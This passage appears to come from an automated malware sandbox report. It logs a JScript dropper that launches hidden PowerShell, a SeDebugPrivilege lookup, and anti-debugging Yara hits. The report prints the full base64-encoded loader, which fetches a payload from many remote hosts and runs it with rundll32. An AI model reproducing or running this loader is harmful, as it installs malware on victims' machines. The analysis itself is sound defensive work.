AGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA"

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW May 23, 2023, 9:37 a.m.	show_type: 0 filepath_r: wscript parameters: "C:\ProgramData\aeolus.js" OxeyesSpondaic quadragesima feculence TouristshipFeldspathization filepath: wscript	1	1	0
ShellExecuteExW May 23, 2023, 9:37 a.m.	show_type: 0 filepath_r: powershell parameters: -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA0AEEARABNAEEATABnAEEAeQBBAEQATQBBAE0AQQBBAHUAQQBEAGMAQQBOAHcAQQA9ACIAOwAkAGQAaQBvAHMAYwBvAHIAZQBpAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGMAQQBOAGcAQQB1AEEARABFAEEATQBnAEEAMABBAEMANABBAE0AUQBBADUAQQBEAGcAQQBMAGcAQQB5AEEARABFAEEATQB3AEEAdgBBAEUAWQBBAGMAdwBBADQAQQBGAEEAQQBlAFEAQQB2AEEARwB3AEEAUgBRAEIARgBBAEUAVQBBAFIAZwBBADQAQQBBAD0APQBiAHoAVQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBOAHcAQQA1AEEAQwA4AEEAVQBBAEIAcwBBAEUAdwBBAE4AQQBCAHQAQQBGAFUAQQBMAHcAQgBuAEEARQBFAEEATQBBAEIAVQBBAEcAOABBAFMAQQBBAD0AYgB6AFUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE0AZwBBAHYAQQBIAE0AQQBNAEEAQgBCAEEAQwA4AEEAYwB3AEIANgBBAEUAZwBBAFUAdwBCAEkAQQBEAE0AQQBSAHcAQgBFAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQATABlAHAAcgBvAHQAaQBjAEYAaQBkAGQAbABpAGUAcwAgAGkAbgAgACQAZABpAG8AcwBjAG8AcgBlAGkAbgAgAC0AcwBwAGwAaQB0ACAAIgBiAHoAVQAiACkAIAB7ACQAQwBhAHMAcwBvAGMAawBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBnAEEANQBBAEMANABBAE0AZwBBAHkAQQBEAFkAQQBMAGcAQQB5AEEARABJAEEATQBBAEEAdQBBAEQARQBBAE8AUQBBADQAQQBBAD0APQBXAGEAegBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAVABBAEcARQBBAGIAZwBCAGgAQQBIAFEAQQBiAHcAQgB5AEEARwBrAEEAYwBnAEIAcABBAEgAVQBBAGIAUQBCAHoAQQBGAE0AQQBkAEEAQgB5AEEARwBFAEEAWQB3AEIAagBBAEcAZwBBAGEAUQBCAHUAQQBHADgAQQBMAGcAQgAyAEEARwBrAEEAYgBBAEIAcwBBAEcARQBBAGMAdwBBAD0AVwBhAHoAUQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQBNAFEAQQAwAEEARABnAEEAIgA7ACQAUABlAGMAaABlAGQATABhAGQAeQBoAG8AbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAFkAdwBCAHAAQQBIAEEAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAdQBBAEgAQQBBAGEAUQBCAGoAQQBIAFEAQQBkAFEAQgB5AEEARwBVAEEAYwB3AEEAPQBDAHIARgBsAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASABBAEcAawBBAFkAUQBCAHQAQQBHAEkAQQBaAFEAQgAxAEEASABnAEEATABnAEIAcQBBAEgAQQBBACIAOwAkAHUAbgBzAGUAZQBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBrAEEARwBFAEEAYwBnAEIAbABBAEcARQBBAGIAQQBCAHMAQQBGAFUAQQBiAGcAQgB3AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAFoAQQBBAHUAQQBHAFEAQQBaAFEAQgB1AEEASABRAEEAWQBRAEIAcwBBAEEAPQA9AGUAQQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEANQBBAEMANABBAE0AZwBBADEAQQBEAFEAQQBMAGcAQQA0AEEARABRAEEATABnAEEAeABBAEQAUQBBAE4AdwBBAD0AZQBBAD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBjAFEAQgAxAEEARwBFAEEAYwBnAEIAcABBAEgATQBBAGQAQQBCAHoAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQAiADsAdAByAHkAIAB7ACQAQQBuAGkAcwBpAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAE0AQQBaAFEAQgB0AEEARwBrAEEAYwBBAEIAeQBBAEcAOABBAGIAZwBCAGwAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAbwBBAEcAOABBAGIAZwBCAHYAQQBIAE0AQQBMAGcAQgB1AEEASABrAEEAWQB3AEEAPQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAZwBBAEwAZwBBAHgAQQBEAEUAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAdwBBAEMANABBAE0AUQBBADMAQQBEAFkAQQAiADsAJABSAGUAdAByAG8AbQBpAGcAcgBhAHQAaQBvAG4AUwBhAGwAdABpAHIAZQB3AGkAcwBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYgBnAEIAdgBBAEcASQBBAGIAQQBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEAWgBBAEIATgBBAEcAOABBAGMAZwBCADAAQQBHAEUAQQBiAEEAQgB6AEEAQwA0AEEAYwB3AEIAbwBBAEcAOABBAGQAdwBBAD0AIgA7ACQARQBsAGUAYwB0AHIAbwBsAHkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AUQBBADQAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEkAQQBNAHcAQQA0AEEAQQA9AD0AIgA7ACQAbgBvAG4AbQBpAGwAaQB0AGEAbgB0AGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABMAGUAcAByAG8AdABpAGMARgBpAGQAZABsAGkAZQBzACkAKQA7AHcAZwBlAHQAIAAkAG4AbwBuAG0AaQBsAGkAdABhAG4AdABsAHkAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQA7ACQARABhAG0AYQBzAGsAaQBuAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATwBRAEEAeABBAEMANABBAE0AZwBBADAAQQBEAEUAQQBMAGcAQQA1AEEARABjAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwASQBkAGUAbwBwAHIAYQB4AGkAcwB0AC4AUgB1AG0AaQBuAGEAdABpAHYAZQApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQAxADcAMgA3ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARQBrAEEAWgBBAEIAbABBAEcAOABBAGMAQQBCAHkAQQBHAEUAQQBlAEEAQgBwAEEASABNAEEAZABBAEEAdQBBAEYASQBBAGQAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEASABRAEEAYQBRAEIAMgBBAEcAVQBBAEwAQQBCADIAQQBHAGsAQQBjAEEAQgB6AEEARABzAEEAYwB3AEIAcwBBAEcARQBBAFkAdwBCAHIAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEAIgA7ACQAcwB1AG0AbQBpAG4AZwBzAFAAbwBsAGwAZQByAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAegBBAEgAUQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBwAEEARwBFAEEAUQB3AEIAaABBAEgASQBBAFoAQQBCADEAQQBHAFUAQQBiAEEAQgBwAEEASABNAEEATABnAEIAMwBBAEcAOABBAGMAZwBCAHIAQQBBAD0APQBKAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEARwA4AEEAYQBRAEIAcgBBAEcAawBBAGIAQQBCAHYAQQBHAEkAQQBiAEEAQgBoAEEASABNAEEAZABBAEEAdQBBAEcATQBBAGIAdwBCADEAQQBIAEkAQQBjAHcAQgBsAEEASABNAEEAIgA7ACQAdABvAGcAbABlAHMAcwBDAG8AcgBuAGMAcgBhAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCAGgAQQBIAEEAQQBhAEEAQgA1AEEARwB3AEEAYQBRAEIAdQBBAEcAVQBBAFYAQQBCAG8AQQBHAGsAQQBiAFEAQgBpAEEARwB3AEEAWgBRAEIAdABBAEcARQBBAGIAZwBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7ACQAZwBsAHUAZQBtAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADAAQQBIAEkAQQBZAFEAQgB1AEEASABNAEEAWQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBTAGcAQgBoAEEASABJAEEAWgB3AEIAdgBBAEcAOABBAGIAZwBCAHoAQQBDADQAQQBZAHcAQgB2AEEARwA0AEEAZABBAEIAeQBBAEcARQBBAFkAdwBCADAAQQBHADgAQQBjAGcAQgB6AEEAQQA9AD0AZAB0AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAxAEEARABJAEEATABnAEEAeABBAEQAWQBBAE0AdwBBAHUAQQBEAEkAQQBNAGcAQQA0AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAJABTAHUAcgBhAGQAZABpAHQAaQBvAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBHAGcAQQBhAFEAQgB1AEEASABRAEEAYgB3AEIAcABBAEgATQBBAGQAQQBCAEoAQQBIAE0AQQBiAHcAQgB0AEEARwBVAEEAYwBnAEIAdgBBAEcAMABBAGIAdwBCAHkAQQBIAEEAQQBhAEEAQgBwAEEASABNAEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBkAFEAQgB1AEEARwBrAEEAZABBAEIANQBBAEEAPQA9AFcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAdwBBAEMANABBAE0AZwBBADEAQQBEAFUAQQBMAGcAQQB4AEEARABRAEEATgBnAEEAdQBBAEQARQBBAE8AUQBBADIAQQBBAD0APQBXAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE4AQQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABZAEEATgBnAEEAdQBBAEQAZwBBAE8AUQBBAD0AVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAYwB3AEIAcABBAEcARQBBAEwAZwBCADEAQQBIAE0AQQAiADsAJABpAGIAdQBwAHIAbwBmAGUAbgBEAGUAcgBlAGcAdQBsAGEAdABpAG8AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBjAEEAZABRAEIAaQBBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAagBBAEcARQBBAFoAZwBCAGwAQQBBAD0APQBGAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAdwBCAHMAQQBIAGsAQQBjAEEAQgBvAEEARwA4AEEAYgBnAEIAcABBAEgATQBBAGIAUQBCAEMAQQBHAHcAQQBaAFEAQgB3AEEARwBnAEEAWQBRAEIAeQBBAEcAOABBAGMAQQBCAG8AQQBIAFEAQQBhAEEAQgBoAEEARwB3AEEAYgBRAEIAcABBAEcARQBBAEwAZwBCAG8AQQBHADgAQQBjAGcAQgB6AEEARwBVAEEARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBrAEEAZABBAEIAMQBBAEgAUQBBAFoAUQBCAHkAQQBIAE0AQQBVAHcAQgB0AEEARwA4AEEAYQB3AEIAbABBAEgATQBBAEwAZwBCAGkAQQBHAEUAQQBiAGcAQgBrAEEAQQA9AD0AIgA7AH0AfQAkAFYAaQB0AHQAbABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEUAQQBOAHcAQQB1AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AdwBBAHgAQQBBAD0APQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAWgBRAEIAegBBAEcAMABBAFoAUQBCAHkAQQBHAGsAQQBjAHcAQgBsAEEAQwA0AEEAWgBnAEIAaABBAEcAawBBAGIAQQBBAD0AbwBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEUAQQBOAGcAQQA1AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEkAQQBvAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATQBnAEEAdQBBAEQARQBBAE4AUQBBADAAQQBDADQAQQBNAFEAQQB4AEEARABZAEEATABnAEEAeABBAEQAYwBBAE8AQQBBAD0AIgA7ACQAbQBpAGMAcgBvAHAAaABhAGcAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE4AZwBBAHcAQQBDADQAQQBOAGcAQQB5AEEAQwA0AEEATQBRAEEAMgBBAEQAQQBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQA9AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBZAEEAWQBRAEIAdABBAEcAawBBAGIAQQBCAHAAQQBHAEUAQQBjAGcAQgBwAEEASABRAEEAZQBRAEEAdQBBAEcAUQBBAGIAdwBCADMAQQBHADQAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAPQAiADsA" filepath: powershell	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 23, 2023, 9:37 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (16 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more non-whitelisted processes were created (4 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABIAG8AbABpAHMAdABBAGMAeQBsAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATwBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAeQBBAEQAQQBBAE8AUQBBAD0ARwBRAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAGcAQQAxAEEAQwA0AEEATQBRAEEANQBBAEQAawBBAEwAZwBBAHgAQQBEAGMAQQBNAHcAQQA9ACIAOwAkAG4AaQBiAG8AbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMwBBAEMANABBAE4AUQBBAHkAQQBDADQAQQBOAGcAQQA0AEEAQwA0AEEATQBRAEEAdwBBAEQAZwBBAFIARQBLAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABVAEEATQBRAEEAdQBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQAzAEEARABnAEEATABnAEEAeABBAEQASQBBAE0AdwBBAD0AUgBFAEsAbABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBiAHcAQgBwAEEASABJAEEAWQBRAEIAcABBAEYAQQBBAGMAZwBCAGwAQQBIAEEAQQBkAFEAQgB3AEEARwBFAEEAYgBBAEEAdQBBAEcANABBAGQAUQBBAD0AIgA7ACQAWQBhAGsAbwBuAGEAbgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAGsAQQBjAHcAQgB6AEEASABVAEEAWQBRAEIAawBBAEcARQBBAFkAZwBCAHMAQQBIAGsAQQBMAGcAQgBwAEEARwA0AEEAYQB3AEEAPQB5AHQAZQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEkAQQBNAHcAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHcAQQBDADQAQQBOAGcAQQB3AEEAQQA9AD0AIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEANQA7ACQAYQBzAGUAYwByAGUAdABvAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAUQBBAFkAUQBCAHMAQQBHAHcAQQBiAHcAQgAzAEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHMAQQBHAGsAQQBkAEEAQgBsAEEAQwA0AEEAWgBRAEIANABBAEgAQQBBAGIAdwBCAHoAQQBHAFUAQQBaAEEAQQA9ACIAOwAkAGQAbwBlAGwAaQBuAGcAQQByAGMAaABvAHYAZQByAHMAZQBlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBjAHcAQgB0AEEARwA4AEEAWQB3AEIAeQBBAEcARQBBAGQAQQBBAHUAQQBIAFkAQQBhAFEAQgBoAEEARwBvAEEAWgBRAEIAegBBAEEAPQA9ACIAOwAkAGgAaQBiAGkAcwBjAHUAcwBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBNAFEAQQB1AEEARABFAEEATgBnAEEAdwBBAEMANABBAE8AUQBBAHkAQQBDADQAQQBNAFEAQQA1AEEARABJAEEAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHIAQQBHAEUAQQBhAFEAQgAyAEEARwBFAEEAYgBBAEIANQBBAEcARQBBAEwAZwBCAHAAQQBHADQAQQBhAHcAQQA9AGEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBCAEEASABNAEEAWgBRAEIAcwBBAEcAdwBBAFkAUQBCADAAQQBHAFUAQQBSAFEAQgB0AEEASABBAEEAYQBBAEIAbABBAEcAMABBAFoAUQBCAHkAQQBHAEUAQQBiAEEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFkAdwBCAHYAQQBIAFUAQQBiAGcAQgAwAEEASABJAEEAZQBRAEEAPQBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNA